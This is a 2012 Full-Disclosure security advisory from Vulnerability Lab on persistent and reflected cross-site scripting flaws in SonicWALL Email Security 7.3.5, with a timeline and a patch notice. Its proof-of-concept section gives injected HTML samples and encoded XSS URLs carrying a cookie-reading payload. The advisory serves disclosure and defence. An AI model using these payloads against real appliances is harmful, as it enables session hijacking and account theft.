[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
- From: Vulnerability Lab <admin@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 18 Sep 2012 00:56:07 +0200
Title:
======
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
Date:
=====
2012-08-14
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=543
VL-ID:
=====
543
Common Vulnerability Scoring System:
====================================
3.5
Introduction:
=============
While most businesses now have some type of anti-spam protection, many must
deal with cumbersome
management, frustrated users, inflexible solutions, and a higher-than-expected
total cost of ownership.
SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use,
award-winning SonicWALL
Email Security solutions employ a variety of proven and patented technology
designed to block spam and
other threats effectively, easily and economically. With innovative protection
techniques for both
inbound and outbound email plus unique management tools, the Email Security
platform delivers superior
email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security
Appliance, as a software
application on a third party Windows® server, or as a SonicWALL Email Security
Virtual Appliance in a
VMW® environment. The SonicWALL Email Security Virtual Appliance provides the
same powerful protection as a
traditional SonicWALL Email Security appliance, only in a virtual form, to
optimize utilization,
ease migration and reduce capital costs.
(Copy of the Vendor Homepage:
http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract:
=========
Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities
in SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
Report-Timeline:
================
2012-05-02: Researcher Notification & Coordination
2012-05-03: Vendor Notification
2012-05-10: Vendor Response/Feedback
2012-08-14: Public or Non-Public Disclosure (90 Days passed)
2012-09-17: Vendor Fix/Patch
Status:
========
Published
Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in SonicWalls
UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker or local low privileged user
account to inject/implement malicious persistent script
code on application side of the email security appliance application. The
vulnerabilities are located on the Compliance & Virus
protection procedures module when processing to load unsanitized inputs as
output listing of a configuration. Vulnerable values are
floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser,
safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser,
zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation of the
vulnerability result in session hijacking,
persistent phishing requests & stable persistent module context manipulation.
Vulnerable Module(s):
[+] Virenschutzverfahren
[-] Ausgehend (Outgoing) - Listing & Exceptions
[+] Compliance Module
[-] Approval Ordner > Add new Approval Folder
1.2
Multiple client side cross site scripting vulnerabilities are detected in
SonicWalls UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows an remote attacker to manipulate client side appliance
requests with medium required user inter action.
Successful exploitation results in sessio hijacking, account steal, client side
phishing requests or manipulated context
exection on client side requests. The vulnerabilities are located on the
`from`- & `row` page listing values. Successful exploitation
of the vulnerability result in client side session hijacking, non-persistent
phishing requests & non-persistent module context manipulation.
Vulnerable Module(s):
[+] Listing Page (?from & ?row)
Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote
attackers with low privileged user accounts.
For demonstration or reproduce ...
PoC: Ausgehend (Outgoing) - Listing & Exceptions
<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold"
value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT
PERSISTENT CODE!]' <"="">
<input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>
... or
<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">
... or
amp;lt;input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">
... or
<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">
... or
<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">
URL: http://esserver.127.0.0.1:8080/virus_config.html
PoC: Compliance Module -> Approval Ordner - Listing & Exceptions
<tbody><tr><td
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"
width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15"
width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span
class="column">Approval-
Ordner</span></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td
background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
align="right"><input type="button" name="delete" class="button"
value="Löschen"
URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html
1.2
The client side cross site scripting vulnerability can be exploited by remote
attackers with medium required user inter action.
For demonstration or reproduce ...
PoC:
http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST
REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
Solution:
=========
The Email Security 7.3.6 patch that addresses this set of issues has now been
posted and is available to all of our Email Security customers
from the download section of our customer portal
(https://www.mysonicwall.com/Firmware/DownloadCenter.aspx).
Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities are
estimated as high(-).
1.2
The security risk of the client side cross site scripting vulnerabilities are
estimated as low(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxxxxxx)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.vulnerability-lab.com/register
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - support@xxxxxxxxxxxxxxxxxxxxx
- research@xxxxxxxxxxxxxxxxxxxxx
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com
- news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
support@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2012 | Vulnerability
Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/